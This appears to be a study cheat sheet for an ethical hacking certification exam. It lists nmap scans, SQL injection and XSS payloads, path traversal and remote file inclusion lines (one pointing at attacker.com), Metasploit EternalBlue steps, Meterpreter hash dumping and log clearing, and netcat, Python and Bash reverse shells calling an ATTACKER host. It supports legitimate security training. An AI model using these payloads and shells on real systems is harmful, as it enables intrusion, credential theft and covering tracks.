⚑ Ethical Hacking β€” Exam Cheat Sheet ⚑
πŸ” NMAP Scan Types
nmap [options] <target>
SYN (Stealth)nmap -sS <target>
TCP Connectnmap -sT <target>
UDP Scannmap -sU -p 53,161 <target>
FIN Scannmap -sF <target>
Ping Sweepnmap -sn 192.168.1.0/24
OS Detectionnmap -O <target>
Version Detectnmap -sV <target>
All Scriptsnmap -sC <target>
Aggressivenmap -A <target>
All Portsnmap -p- <target>
Specific Portsnmap -p 22,80,443 <target>

Timing (-T)

T0 Paranoid T1 Sneaky T2 Polite T3 Normal T4 Aggressive T5 Insane

Port Response States

OpenSYN-ACK received
ClosedRST received
FilteredNo response / ICMP unreachable
πŸ“‹ NMAP Enumeration Scripts (NSE)

SMB / Windows

nmap --script smb-enum-users.nse -p445 <host> nmap --script smb-enum-groups.nse -p445 <host> nmap --script smb-enum-shares.nse -p445 <host> nmap --script smb-enum-processes.nse \ --script-args smbusername=<u>,smbpass=<p> -p445 <host>

Web

nmap -sV --script=http-enum <target>

SNMP

nmap -sU -p161 --script=snmp-info <target> nmap -sU -p161 --script=snmp-brute <target>

SMTP Open Relay

nmap -p25 --script=smtp-open-relay <target>

Vuln Scan Combo

nmap -sV -sC -O -p- -T4 <target>

Other Enum Tools

enum4linuxenum4linux -a <target>
smbclientsmbclient -L //<target>
Nikto (web)nikto -h <target>
gobustergobuster dir -u <url> -w <wordlist>
ffufffuf -u <url>/FUZZ -w <wordlist>
🌐 DNS & Passive Recon
nslookupnslookup <domain>
dig anydig <domain> any
dig MXdig <domain> mx
dig reversedig -x <IP>
whoiswhois <domain>
DNSrecondnsrecon -d <domain>
theHarvestertheHarvester -d <domain> -b all
h8mailpip3 install h8mail β†’ h8mail -t <email>

Recon-ng Key Commands

recon-ng marketplace search <keyword> marketplace install <module> modules load <module> options set SOURCE <domain> run

Google Dorks

filetypefiletype:xls "passwords"
inurlinurl:admin login
intitleintitle:"Index of /etc"
Sessions leakintext:JSESSIONID inurl:access.log
Shodanshodan search <query>
πŸ’‰ SQL Injection

Basic Tests β€” put in any input field

' " ' OR '1'='1 ' OR '1'='1' -- ' OR '1'='1' /* admin'-- ' OR 1=1-- 1 OR 1=1 Smith' or '1'='1

UNION-Based

1 UNION SELECT null,null,null-- 1 UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data-- omar' UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data --

Blind / Boolean

1 AND 1=1 β†’ true (data shown) 1 AND 1=2 β†’ false (blank/error) ' AND SUBSTRING(username,1,1)='a'--

Time-Delay (Blind)

MySQL: ' AND SLEEP(5)-- id=8 AND IF(version() like '8%',sleep(10),'false'))-- MSSQL: '; WAITFOR DELAY '0:0:5'-- Postgres: '; SELECT pg_sleep(5)--

Stacked Queries

1; DELETE FROM customers 1; INSERT INTO users(username) VALUES ('omar')

URL Injection

?id=99 AND 1=2 (false) ?id=99 AND 1=1 (true) ?id=1234' UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data --

DB Fingerprint (concat test)

MySQL'finger' + 'printing'
MSSQL'finger' 'printing'
Oracle/PG'finger'||'printing'

Categories

In-band Blind/Inferential Out-of-band Boolean Time-delay Stacked UNION Error-based
SQLmapsqlmap -u "<url>" --dbs
πŸ”Œ Key Ports
21FTP
22SSH
23Telnet
25SMTP
53DNS
80HTTP
110POP3
135MS-RPC
137-139NetBIOS
143IMAP
161/UDPSNMP
443HTTPS
445SMB
465SMTPS
587SSMTP
993IMAPS
995POP3S
3306MySQL
3389RDP
5355/UDPLLMNR
⚑ XSS Payloads

Basic Test

<script>alert("XSS")</script> javascript:alert(document.cookie) <script>alert(document.cookie)</script>

Img Tag

<img src=javascript:alert('xss')> <img src="x" onerror="alert('xss')">

Event Handlers

<a onmouseover="alert(document.cookie)">click</a> <body onload=alert('xss')>

Types

Reflected (non-persist) Stored (persistent) DOM-based
πŸ” Auth & Session Attacks

Session Fingerprint IDs

PHPPHPSESSID
Java/J2EEJSESSIONID
ASP.NETASP.NET_SessionId
ColdFusionCFID / CFTOKEN

Pass-the-Hash

Password Tools

hashcat dicthashcat -m 0 hash.txt wordlist
john dictjohn --wordlist=rockyou.txt hash
john brutejohn --incremental hash

CSRF Attack Pattern

http://target/csrf/?password_new=NEWPASS &password_conf=NEWPASS&Change=Change#
πŸ“ Path Traversal / File Inclusion

Directory Traversal

?page=../../../../../etc/passwd ?page=../../etc/shadow

URL Encoded Variants

../%2e%2e%2f
../%2e%2e/
../..%2f
..\%2e%2e%5c

LFI (Local File Inclusion)

?file=../etc/passwd ?lang=../../../../etc/passwd%00

RFI (Remote File Inclusion)

?page=http://attacker.com/malware.html
🎯 Metasploit Framework
msfconsole search <term> use exploit/windows/smb/ms17_010_eternalblue show options set RHOST <target-ip> set LHOST <your-ip> exploit (or run)

EternalBlue (MS17-010)

use exploit/windows/smb/ms17_010_eternalblue set RHOST <target> set LHOST <attacker> exploit

Meterpreter Commands

List procsps
Dump hasheshashdump
Shellshell
Upload fileupload /path/file
Download filedownload /path/file
Network infoipconfig
Who am Igetuid
Clear logsclearev
Migrate procmigrate <PID>
Webcam snapwebcam_snap
Search filessearch -f *.txt

Search Exploits CLI

searchsploit smb searchsploit <CVE-XXXX-XXXX>
🐚 Netcat & Shells

Bind Shell (victim listens)

# On VICTIM β€” open listener + shell nc -lvp 1234 -e /bin/bash # On ATTACKER β€” connect to victim nc -nv <victim-ip> 1234

Reverse Shell (attacker listens)

# On ATTACKER β€” open listener nc -lvp 666 # On VICTIM β€” connect back to attacker nc <attacker-ip> 666 -e /bin/bash

Other Netcat Uses

Port scannc -z <ip> 20-1000
Banner grabnc -nv <ip> 80
Send filenc -nv <ip> 1234 < file.txt
Recv filenc -lvp 1234 > out.txt

Python Reverse Shell

python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("ATTACKER",666)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])'

Bash Reverse Shell

bash -i >& /dev/tcp/ATTACKER/666 0>&1
🌩 Network Attacks

LLMNR/NBT-NS Poisoning

  • Tool: Responder
  • Spoof name resolution on LAN
  • Capture NTLMv2 hashes
  • Crack offline β†’ plain passwords

ARP Poisoning / MITM

  • Tool: Ettercap, ARPspoof
  • Spoof MAC β†’ intercept L2 traffic
  • ARP cache = IPβ†’MAC table poisoned

DNS Cache Poisoning

  • Inject bad DNS records
  • Victim β†’ attacker's IP instead of real

SMTP Commands (user enum)

telnet <mailserver> 25 HELO test VRFY omar EXPN admins

SNMP Attack

Walksnmp-check <target>
Default credspublic / private
Brute NSE--script snmp-brute

FTP Anonymous

ftp <target> Username: anonymous Password: (blank or email)

DoS Types

Direct Reflected Amplification Botnet DDoS
🏴 Post-Exploitation & Persistence

Persistence Methods

  • Bind / Reverse shells
  • Scheduled tasks (Windows)
  • Custom daemons / services
  • Add new user accounts
  • Backdoors + rootkits
  • SSH tunnels / port forwarding

Lateral Movement

  • Network scanning post-exploit
  • SMB share enumeration
  • Pass-the-hash attacks
  • RDP / VNC access
  • Credential dumping β†’ reuse

Cover Tracks

  • Delete created user accounts
  • Remove uploaded files & tools
  • Remove backdoors & daemons
  • Clear logs: clearev (meterp)
  • Restore modified configs

Steganography (steghide)

sudo apt install steghide # Hide data in image: steghide embed -cf image.png -sf secret.txt # Extract: steghide extract -sf image.png

Priv Escalation Types

Vertical (low→admin) Horizontal (user→user)
πŸ”Ÿ OWASP Top 10 & Misc Web Attacks

OWASP 2025 Categories

Injection Broken Auth SSRF Cryptographic Failures Insecure Design Security Misconfiguration Vulnerable Components Integrity Failures Logging Failures Broken Access Control

IDOR (Insecure Direct Object Ref)

?customerID=1188 β†’ change to 1189 ?user=omar β†’ change to admin

HTTP Parameter Pollution

?search=cars&results=20&search=bikes (same param twice with diff value)

HTTP Methods

GETPOST PUTDELETE OPTIONSTRACE

Command Injection

192.168.1.1; cat /etc/passwd 192.168.1.1 | whoami 192.168.1.1 && id

CSRF Attack URL

http://target/changepass? password_new=hack&password_conf=hack &Change=Change#

HTTP Status Ranges

1xxInformational
2xxSuccess
3xxRedirect
4xxClient Error
5xxServer Error

Web Proxy Tools

Burp Suite OWASP ZAP Wireshark
πŸ“ Methodology & Pentest Phases

Pentest Phases (EC-Council)

  • 1. Reconnaissance (passive/active)
  • 2. Scanning & Enumeration
  • 3. Gaining Access (exploitation)
  • 4. Maintaining Access (persistence)
  • 5. Covering Tracks
  • 6. Reporting ← always!

Test Types

Black BoxNo prior knowledge
White BoxFull info (diagrams, creds)
Gray BoxLimited info (some creds)
CTFSpeed, get flags fast

Key Legal Documents

SOW (Statement of Work) NDA (Non-Disclosure) SLA (Service Level Agr.) Rules of Engagement Scope Definition

Vulnerability Scan Types

Unauthenticated Authenticated Discovery Full Stealth Compliance

Scoring Standards

CVECVE-YYYY-NNNN
CVSSScore 0–10 (base/temp/env)
CWEWeakness taxonomy
Metasploit= HIGH severity rule
🎭 Social Engineering

Attack Types

Physical

Influence Methods

Authority Fear Urgency Likeness Scarcity Social Proof

Tools

SETsetoolkit β†’ clone sites
BeEFXSS-based browser hook
⚑ Quick Reference

Kali One-liners

# Ping sweep nmap -sn 192.168.1.0/24 # All ports, version, default scripts nmap -sV -sC -p- <target> # Aggressive nmap -A -T4 <target> # Vuln scripts nmap --script vuln <target> # FTP anon check nmap --script ftp-anon <target> # SMB vuln check nmap --script smb-vuln* <target> # Nikto scan nikto -h http://<target> # Gobuster gobuster dir -u http://<target> \ -w /usr/share/wordlists/dirb/common.txt

SQLmap Quick

sqlmap -u "http://site.com/page?id=1" --dbs sqlmap -u "url" -D <db> --tables sqlmap -u "url" -D <db> -T <table> --dump
πŸ“ Pentest Report Structure

Required Sections

  • Executive Summary
  • Scope Details
  • Methodology used
  • Findings (with CVSS scores)
  • Remediation guidance
  • Conclusion & Summary
  • Appendix + Glossary

Remediation Controls

Technical (MFA, patching) Administrative (policies) Operational (training) Physical (CCTV, mantraps)

Post-Engagement

  • Remove all test artifacts
  • Restore original configs
  • Delete test credentials
  • Client sign-off / acceptance
  • Destroy client sensitive data
ETHICAL HACKING EXAM CHEAT SHEET β€” FOR AUTHORIZED TESTING ONLY